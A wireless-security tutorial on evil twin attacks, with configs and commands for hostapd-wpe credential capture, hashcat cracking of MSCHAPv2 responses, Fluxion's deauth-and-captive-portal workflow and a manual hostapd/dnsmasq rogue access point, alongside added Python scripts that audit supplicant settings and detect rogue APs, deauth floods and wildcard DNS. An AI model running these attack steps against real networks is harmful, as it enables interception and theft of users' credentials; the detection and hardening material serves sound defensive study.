Evil Twin Attack

Exploitation

An Evil Twin is a rogue access point that advertises the same SSID as a legitimate network. Clients that connect to it give the attacker a position from which to capture credentials or intercept their traffic.

Using hostapd-wpe for WPA-Enterprise

Install hostapd-wpe.

01-install-hostapd-wpe.sh

```bash
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
cd hostapd-wpe
./install.sh
```

Configure hostapd-wpe.conf.

hostapd-wpe.conf

```ini
interface=wlan0
ssid=CorpWiFi
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
```

Run the attack. Credentials from clients that authenticate to the rogue AP appear in the output. A supplicant that validates the RADIUS server certificate (pinned CA plus a server-name match) aborts before the inner MSCHAPv2 exchange and leaks nothing, so only misconfigured clients yield anything.

02-run-hostapd-wpe.sh

```bash
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
```

The MSCHAPv2 challenge/response that hostapd-wpe prints can be cracked offline. Write it in hashcat's NetNTLMv1 format (username::::response:challenge) and run hash mode 5500 against a wordlist.

03-crack-mschap.sh

```bash
hashcat -m 5500 captured.hash /usr/share/wordlists/rockyou.txt
```
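The defensive counterpart to the capture above is a supplicant that refuses the rogue RADIUS server before it ever sends an MSCHAPv2 response. The following Python script is an added example, not part of the original page or of hostapd-wpe: it parses wpa_supplicant network blocks and flags the settings that would let any server certificate be accepted. The two network blocks, the CA path, the `domain_match` value and the credentials are constructed samples.

```python
"""Audit wpa_supplicant network blocks for settings that let an evil twin's
RADIUS server be accepted by the client.

Added example; not part of the original page or of hostapd-wpe. The two
network blocks, the CA path, the domain name and the credentials are
constructed samples.
"""
import re

# Constructed: the first block trusts any RADIUS certificate, the second pins
# the CA and the server name and hides the real username in the outer identity.
SAMPLE_CONFIG = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous"
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.DOTALL)
SERVER_NAME_KEYS = ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")


def parse_networks(text):
    """Return one dict per network={...} block, with surrounding quotes stripped."""
    networks = []
    for body in BLOCK_RE.findall(text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks


def audit_network(net):
    """Return findings for one block; an empty list means the block is acceptable."""
    findings = []
    if "EAP" not in net.get("key_mgmt", ""):
        return findings  # PSK and open networks: server-certificate checks do not apply
    if "ca_cert" not in net and "ca_path" not in net:
        findings.append("no ca_cert/ca_path: any RADIUS server certificate is accepted")
    if not any(key in net for key in SERVER_NAME_KEYS):
        findings.append("no domain/subject match: any certificate from the trusted CA is accepted")
    if "anonymous_identity" not in net and "identity" in net:
        findings.append("no anonymous_identity: the real username is sent in the clear outer EAP identity")
    return findings


def audit_config(text):
    """Return [(ssid, findings), ...] for every network block in a config file."""
    return [(net.get("ssid", "?"), audit_network(net)) for net in parse_networks(text)]


if __name__ == "__main__":
    for ssid, findings in audit_config(SAMPLE_CONFIG):
        print(f"{ssid}: {'OK' if not findings else 'WEAK'}")
        for finding in findings:
            print(f"  - {finding}")
```

The first block reports three findings and the second none. The `ca_cert` check alone is not enough: without a `domain_match` (or `domain_suffix_match`/`subject_match`) the client accepts any certificate the trusted CA has ever issued, which is exactly the gap a rogue AP with a legitimately purchased certificate exploits.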

Using Fluxion (Automated WPA-PSK)

Fluxion automates the evil twin process for WPA-PSK networks.

04-fluxion.sh

```bash
git clone https://github.com/FluxionNetwork/fluxion
cd fluxion
sudo ./fluxion.sh
```

Fluxion workflow:

  1. Scan for targets
  2. Capture handshake
  3. Create evil twin
  4. Deauth clients from real AP
  5. Clients connect to evil twin
  6. Serve captive portal asking for WiFi password
  7. Validate password against handshake

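Steps 3 to 5 of that workflow leave two footprints a wireless sensor can see: a beacon for a managed SSID from a BSSID the WLAN inventory does not know (often with encryption dropped, the captive-portal pattern), and a burst of deauthentication frames spoofing the real AP as sender. The following Python script is an added example, not part of the original page or of Fluxion, and it flags both. The frame records, the BSSID inventory and the threshold values are constructed assumptions; a real sensor would feed records from a monitor-mode capture.

```python
"""Flag evil-twin indicators in a stream of 802.11 management-frame records.

Added example; not part of the original page or of Fluxion. The frame records,
the BSSID inventory and the thresholds are constructed assumptions; a real
sensor would feed records from a monitor-mode capture.
"""
from collections import defaultdict

# Constructed records: (timestamp_s, frame_type, source_bssid, ssid, security).
# security is "WPA2" when the beacon carries an RSN element, "OPEN" when it
# carries none; deauth records leave ssid/security empty.
FRAMES = [
    (0.00, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi", "WPA2"),
    (0.10, "beacon", "aa:bb:cc:00:00:02", "CorpWiFi", "WPA2"),
    (1.00, "beacon", "de:ad:be:ef:00:01", "CorpWiFi", "OPEN"),  # open twin
    (1.00, "beacon", "de:ad:be:ef:00:02", "CorpWiFi", "WPA2"),  # twin with same security
    (1.50, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi", "WPA2"),
] + [
    # Burst of deauth frames spoofing the real AP as sender (constructed).
    (2.0 + i * 0.01, "deauth", "aa:bb:cc:00:00:01", "", "") for i in range(61)
]

# Assumption: BSSIDs the WLAN controller reports for each managed SSID.
KNOWN_BSSIDS = {"CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}

DEAUTH_WINDOW_S = 1.0   # sliding window length in seconds
DEAUTH_THRESHOLD = 20   # deauth frames per window that count as a flood


def find_rogue_aps(frames, known):
    """Return (kind, ssid, bssid) for each unknown BSSID beaconing a managed SSID.

    kind is "open-twin" when the rogue drops encryption (the captive-portal
    pattern) and "rogue-bssid" when it copies the real network's security.
    """
    alerts, reported = [], set()
    for _, ftype, bssid, ssid, security in frames:
        if ftype != "beacon" or ssid not in known:
            continue
        if bssid in known[ssid] or bssid in reported:
            continue
        reported.add(bssid)
        kind = "open-twin" if security == "OPEN" else "rogue-bssid"
        alerts.append((kind, ssid, bssid))
    return alerts


def find_deauth_floods(frames, window=DEAUTH_WINDOW_S, threshold=DEAUTH_THRESHOLD):
    """Return (bssid, peak_count) for senders whose deauth rate reaches the
    threshold within any sliding window of `window` seconds."""
    stamps_by_sender = defaultdict(list)
    for ts, ftype, bssid, _, _ in frames:
        if ftype == "deauth":
            stamps_by_sender[bssid].append(ts)
    floods = []
    for bssid, stamps in stamps_by_sender.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            floods.append((bssid, peak))
    return floods


if __name__ == "__main__":
    for alert in find_rogue_aps(FRAMES, KNOWN_BSSIDS):
        print("rogue AP:", alert)
    for flood in find_deauth_floods(FRAMES):
        print("deauth flood:", flood)
```

The deauth check keys on the spoofed sender address because that is what the frames carry; the legitimate AP will not be the one transmitting them. Enabling Protected Management Frames (802.11w) on the real network makes unauthenticated deauth frames ineffective against clients that support it, which removes step 4 of the workflow rather than merely detecting it.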
Manual Evil Twin with hostapd + dnsmasq

Configure hostapd.conf for an open network.

hostapd.conf

```ini
interface=wlan1
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
wmm_enabled=0
macaddr_acl=0
auth_algs=1
wpa=0
```

Start the fake AP.

05-start-hostapd.sh

```bash
sudo hostapd hostapd.conf
```

Configure DHCP and DNS with dnsmasq. The address=/#/192.168.1.1 line answers every DNS query with the AP's own address, so whatever site a client opens lands on the attacker's portal.

dnsmasq.conf

```ini
interface=wlan1
dhcp-range=192.168.1.100,192.168.1.200,12h
address=/#/192.168.1.1
```

Enable IP forwarding and NAT so clients keep internet access through the upstream interface (optional).

06-enable-nat.sh

```bash
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
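The wildcard DNS answer in the dnsmasq config above is itself an indicator a client can test for: unrelated names that all resolve to one private address, and a name that cannot exist still getting an answer. The following Python script is an added example, not part of the original page, that applies those checks to a table of resolver answers. The answer tables are constructed; a real client check would query the resolver handed out by DHCP and generate the probe label fresh each time.

```python
"""Detect the wildcard DNS pattern an evil twin's captive portal relies on
(dnsmasq address=/#/192.168.1.1 answers every query with the AP's address).

Added example; not part of the original page. The answer tables below are
constructed; a real client check would query the resolver handed out by DHCP.
"""
import ipaddress
import secrets


def random_probe_label():
    """A label under the reserved .invalid TLD: an honest resolver returns NXDOMAIN."""
    return f"{secrets.token_hex(6)}.invalid"


# Constructed answers (name -> address, None = NXDOMAIN) behind an evil twin
# that runs the dnsmasq config above.
EVIL_TWIN_ANSWERS = {
    "example.com": "192.168.1.1",
    "example.net": "192.168.1.1",
    "example.org": "192.168.1.1",
    "c0ffee0ddba11.invalid": "192.168.1.1",
}
# Constructed answers from an honest resolver (documentation address ranges).
HONEST_ANSWERS = {
    "example.com": "203.0.113.10",
    "example.net": "198.51.100.20",
    "example.org": "192.0.2.30",
    "c0ffee0ddba11.invalid": None,
}


def looks_like_wildcard_dns(answers, gateway=None):
    """Return (verdict, reasons) for a dict of name -> answer (None for NXDOMAIN)."""
    reasons = []
    resolved = {name: ip for name, ip in answers.items() if ip is not None}

    # 1. A name that cannot exist still gets an answer: a wildcard record.
    for name, ip in resolved.items():
        if name.endswith(".invalid"):
            reasons.append(f"reserved name {name} resolved to {ip}")

    # 2. Unrelated names all collapse onto one address.
    distinct = set(resolved.values())
    if len(resolved) >= 3 and len(distinct) == 1:
        ip = distinct.pop()
        reasons.append(f"all {len(resolved)} probe names resolve to {ip}")
        if ipaddress.ip_address(ip).is_private:
            reasons.append(f"{ip} is a private address, not a public host")
        if gateway is not None and ip == gateway:
            reasons.append("the answer is the default gateway itself")
    return bool(reasons), reasons


if __name__ == "__main__":
    for label, table in (("evil twin", EVIL_TWIN_ANSWERS), ("honest", HONEST_ANSWERS)):
        verdict, reasons = looks_like_wildcard_dns(table, gateway="192.168.1.1")
        print(f"{label}: {'SUSPICIOUS' if verdict else 'clean'}")
        for reason in reasons:
            print("  -", reason)
```

Legitimate captive portals (hotel and airport networks) trigger the same checks, which is why operating systems run a probe like this at connection time and warn the user instead of silently trusting the network; the point for a client is to treat the network as hostile until it passes.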